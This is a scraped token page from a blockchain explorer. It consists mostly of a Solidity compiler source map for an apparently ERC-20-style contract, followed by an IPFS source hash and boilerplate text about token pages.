9;:27;;;;;;:39;;24097:6;24065:31;:39::i;:::-;24045:16;;;-1:-1:-1;;;;;24045:16:0;;;24035:27;;;;:9;:27;;;;;;;;;:69;;;;24130:16;;24113:42;;1342:25:1;;;24130:16:0;;;;24113:42;;;;;;1315:18:1;24113:42:0;;;;;;;24015:145;24174:20;:6;24185:8;24174:10;:20::i;:::-;24165:29;;23940:259;24224:71;24246:6;24224:71;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;24224:17:0;;;;;;:9;:17;;;;;;;:71;:21;:71::i;:::-;-1:-1:-1;;;;;24204:17:0;;;;;;;:9;:17;;;;;;:91;;;;24322:20;;;;;;;:32;;24347:6;24322:24;:32::i;:::-;-1:-1:-1;;;;;24299:20:0;;;;;;;:9;:20;;;;;;;:55;;;;24365:35;;;;;;;;;;24393:6;1342:25:1;;1330:2;1315:18;;1196:177;24365:35:0;;;;;;;;22798:1607;;;22711:1694;;;:::o;12895:177::-;12991:7;13034:12;13026:6;;;;13018:29;;;;-1:-1:-1;;;13018:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;13058:5:0;;;12895:177::o;25107:323::-;-1:-1:-1;;;;;25184:21:0;;25176:67;;;;-1:-1:-1;;;25176:67:0;;5241:2:1;25176:67:0;;;5223:21:1;5280:2;5260:18;;;5253:30;5319:34;5299:18;;;5292:62;-1:-1:-1;;;5370:18:1;;;5363:31;5411:19;;25176:67:0;5039:397:1;25176:67:0;25268:68;25291:6;25268:68;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;25268:18:0;;;;;;:9;:18;;;;;;;:68;:22;:68::i;:::-;-1:-1:-1;;;;;25247:18:0;;;;;;:9;:18;;;;;:89;25355:12;;:24;;25372:6;25355:16;:24::i;:::-;25340:12;:39;25388:37;;1342:25:1;;;25414:1:0;;-1:-1:-1;;;;;25388:37:0;;;;;1330:2:1;1315:18;25388:37:0;;;;;;;25107:323;;:::o;2194:122::-;2099:7;2119:6;-1:-1:-1;;;;;2119:6:0;775:10;2251:23;2243:68;;;;-1:-1:-1;;;2243:68:0;;5643:2:1;2243:68:0;;;5625:21:1;;;5662:18;;;5655:30;5721:34;5701:18;;;5694:62;5773:18;;2243:68:0;5441:356:1;25853:332:0;26018:16;;25986:63;;26003:4;;-1:-1:-1;;;;;26018:16:0;26037:11;25986:8;:63::i;:::-;26053:16;;-1:-1:-1;;;;;26053:16:0;:32;26094:9;26116:4;26125:11;26053:16;;26150:7;2099;2119:6;-1:-1:-1;;;;;2119:6:0;;2053:77;26150:7;26053:127;;;;;;-1:-1:-1;;;;;;26053:127:0;;;-1:-1:-1;;;;;6161:15:1;;;26053:127:0;;;6143:34:1;6193:18;;;6186:34;;;;6236:18;;;6229:34;;;;6279:18;;;6272:34;6343:15;;;6322:19;;;6315:44;26161:15:0;6375:19:1;;;6368:35;6077:19;;26053:127:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;25853:332;;:::o;3193:167::-;3260:16;3279:6;;-1:-1:-1;;;;;3289:17:0;;;-1:-1:-1;;;;;;3289:17:0;;;;;;3315:40;;3279:6;;;;;;;3315:40;;3260:16;3315:40;3256:104;3193:167;:::o;11530:88::-;11588:7;11608:5;11612:1;11608;:5;:::i;11877:88::-;11935:7;11955:5;11959:1;11955;:5;:::i;22388:294::-;-1:-1:-1;;;;;22481:18:0;;22473:68;;;;-1:-1:-1;;;22473:68:0;;7322:2:1;22473:68:0;;;7304:21:1;7361:2;7341:18;;;7334:30;7400:34;7380:18;;;7373:62;-1:-1:-1;;;7451:18:1;;;7444:35;7496:19;;22473:68:0;7120:401:1;22473:68:0;-1:-1:-1;;;;;22553:16:0;;22545:64;;;;-1:-1:-1;;;22545:64:0;;7728:2:1;22545:64:0;;;7710:21:1;7767:2;7747:18;;;7740:30;7806:34;7786:18;;;7779:62;-1:-1:-1;;;7857:18:1;;;7850:33;7900:19;;22545:64:0;7526:399:1;22545:64:0;22630:1;22621:6;:10;22613:64;;;;-1:-1:-1;;;22613:64:0;;8132:2:1;22613:64:0;;;8114:21:1;8171:2;8151:18;;;8144:30;8210:34;8190:18;;;8183:62;-1:-1:-1;;;8261:18:1;;;8254:39;8310:19;;22613:64:0;7930:405:1;22613:64:0;22388:294;;;:::o;11225:88::-;11283:7;11303:5;11307:1;11303;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1900:180::-;1959:6;2012:2;2000:9;1991:7;1987:23;1983:32;1980:52;;;2028:1;2025;2018:12;1980:52;-1:-1:-1;2051:23:1;;1900:180;-1:-1:-1;1900:180:1:o;2085:186::-;2144:6;2197:2;2185:9;2176:7;2172:23;2168:32;2165:52;;;2213:1;2210;2203:12;2165:52;2236:29;2255:9;2236:29;:::i;2484:260::-;2552:6;2560;2613:2;2601:9;2592:7;2588:23;2584:32;2581:52;;;2629:1;2626;2619:12;2581:52;2652:29;2671:9;2652:29;:::i;:::-;2642:39;;2700:38;2734:2;2723:9;2719:18;2700:38;:::i;:::-;2690:48;;2484:260;;;;;:::o;3156:127::-;3217:10;3212:3;3208:20;3205:1;3198:31;3248:4;3245:1;3238:15;3272:4;3269:1;3262:15;3288:125;3353:9;;;3374:10;;;3371:36;;;3387:18;;:::i;6414:306::-;6502:6;6510;6518;6571:2;6559:9;6550:7;6546:23;6542:32;6539:52;;;6587:1;6584;6577:12;6539:52;6616:9;6610:16;6600:26;;6666:2;6655:9;6651:18;6645:25;6635:35;;6710:2;6699:9;6695:18;6689:25;6679:35;;6414:306;;;;;:::o;6725:168::-;6798:9;;;6829;;6846:15;;;6840:22;;6826:37;6816:71;;6867:18;;:::i;6898:217::-;6938:1;6964;6954:132;;7008:10;7003:3;6999:20;6996:1;6989:31;7043:4;7040:1;7033:15;7071:4;7068:1;7061:15;6954:132;-1:-1:-1;7100:9:1;;6898:217::o;8340:128::-;8407:9;;;8428:11;;;8425:37;;;8442:18;;:::i

Swarm Source

ipfs://d508bfeea41805a72082994a67e3798190bd52dedddfc118f2f32f9a82cb9909
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.